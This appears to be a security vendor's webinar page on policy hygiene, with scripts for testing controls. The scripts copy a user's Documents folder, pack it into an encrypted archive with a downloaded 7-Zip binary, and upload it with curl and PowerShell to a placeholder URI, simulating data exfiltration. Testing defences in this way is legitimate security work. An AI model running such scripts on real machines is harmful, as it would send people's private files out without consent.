Week 12: Policy hygiene and standardization

Name: 100 days to secure your environment webinar series: Week 12
Uploaded: Jul 29, 2025
Description: Week 12: Policy hygiene and standardization

This week’s session was packed with even more actionable strategies to help harden your environment.

What we covered in week 12:

Review and remove unused policies. (Be careful about applications used in regular intervals)
Promote policies to the group or organization level if used across your environment.
Ensure that your USB storage device policies are applied across your organization.
Block Telnet.
Test your policies to ensure they’re set up correctly.

Copy the PowerShell Scripts

(
echo My Music\
echo My Pictures\
echo My Videos\
echo My Documents\
echo Application Data\
echo Local Settings\
echo PrintHood\
echo NetHood\
echo Recent\
echo SendTo\
echo Start Menu\
echo Templates\
) > exclude.txt

xcopy "%USERPROFILE%\Documents" "%USERPROFILE%\Desktop\copy_of_documents" /E /I /H /Y /EXCLUDE:exclude.txt

del exclude.txt


tar -a -c -f "%USERPROFILE%\Desktop\copy_of_documents.zip" -C "%USERPROFILE%\Desktop" copy_of_documents


@echo off
REM Get the computer name
set "hostname=%COMPUTERNAME%"

REM Define the path to the ZIP file on the Desktop
set "filepath=%USERPROFILE%\Desktop\copy_of_documents.zip"

REM Check if the file exists
if not exist "%filepath%" (
    echo File not found: %filepath%
    pause
    exit /b
)

REM Upload the file to the GCS bucket using the hostname as the folder name
REM Replace the following URL with your actual upload URL
set "Insert_URI_here"

REM Use curl to upload the file
curl -X POST -H "Content-Type: application/octet-stream" --data-binary "@%filepath%" "%upload_url%"

echo File 'copy_of_documents.zip' uploaded to folder '%hostname%' in Google Cloud Storage.
pause

‍

Function UploadFile {
    Param([string]$path)

    Process {
        # Generate timestamp and file name
        $timestamp = Get-Date -Format 'yyyy-MM-dd_HH-mm-ss'
        $original = [System.IO.Path]::GetFileName($path)
        $hostname = $env:COMPUTERNAME
        $name = "$hostname/$timestamp`_$original"

        # Check if a placeholder exists
        $checkUri = "Insert_URI_here"
        $checkResponse = Invoke-RestMethod -Uri $checkUri -Method Get

        if (-not $checkResponse.items) {
            $placeholderUri = "Insert_URI_here"
            Invoke-RestMethod -Method Post -Uri $placeholderUri -ContentType 'application/octet-stream' -Body ([byte[]]@())
        }

        # Upload the actual file
        $uploadUri = "Insert_URI_here"
        Invoke-RestMethod -Method Post -Uri $uploadUri -ContentType 'application/octet-stream' -InFile $path
    }
}

# Define the file path
$file = Join-Path ([Environment]::GetFolderPath('Desktop')) 'copy of documents (zipped).7z'

# Try uploading the file
try {
    UploadFile -path $file
} catch {
    Write-Error "Upload failed: $_"
}

‍

# Define paths
$zipUrl = "https://www.7-zip.org/a/7zr.exe"
$zipPath = "$env:USERPROFILE\Apps\7zip"
$sevenZip = "$zipPath\7zr.exe"
$original = "$env:USERPROFILE\Documents"
$tempCopy = "$env:USERPROFILE\Documents_Copy_For_Zip"
$out = "$env:USERPROFILE\Desktop\Copy of Documents (zipped).7z"

# Create 7-Zip directory if it doesn't exist
New-Item -ItemType Directory -Path $zipPath -Force | Out-Null

# Download 7zr.exe if not already present
if (-not (Test-Path $sevenZip)) {
    Invoke-WebRequest -Uri $zipUrl -OutFile $sevenZip
}

# Add 7-Zip to PATH for this session
$env:PATH += ";$zipPath"

# Copy the original Documents folder to a temporary location
Copy-Item -Path $original -Destination $tempCopy -Recurse -Force

# Get all non-reparse (non-symlink) items in the copied folder
$items = Get-ChildItem -Path $tempCopy -Force -ErrorAction SilentlyContinue | Where-Object {
    -not $_.Attributes.ToString().Contains("ReparsePoint")
}

# Compress each item in the copied folder
foreach ($item in $items) {
    & $sevenZip a -t7z $out $item.FullName -ppw -mhe -snl
}

# Delete the temporary copy after successful archive
if (Test-Path $out) {
    Remove-Item $tempCopy -Recurse -Force
} else {
    Write-Host "Cannot find temp"
}

‍A quick note

This webinar series is designed to be as technology-agnostic as possible. You don’t need ThreatLocker to participate, but it certainly helps.

If you want to follow along more easily, we’d be happy to help you get started with a ThreatLocker agent. Just book a demo to chat with a ThreatLocker Solutions Engineer and get a 30-day free trial to the entire ThreatLocker platform.

Stay on track

Download the week 12 checklist on this page to keep up with key tasks and harden your environment step by step.

Missed previous weeks?

You can get caught up here.

‍

REGISTER TODAY

WATCH THE WEBINAR

watch the replay

Additional RESOURCES

Access the additional downloadable resource that will help you make the most of this webinar.

Whether you're starting from zero or organizing an inherited environment, this tactical checklist will help you fully secure your environment step by step.

Download the PDF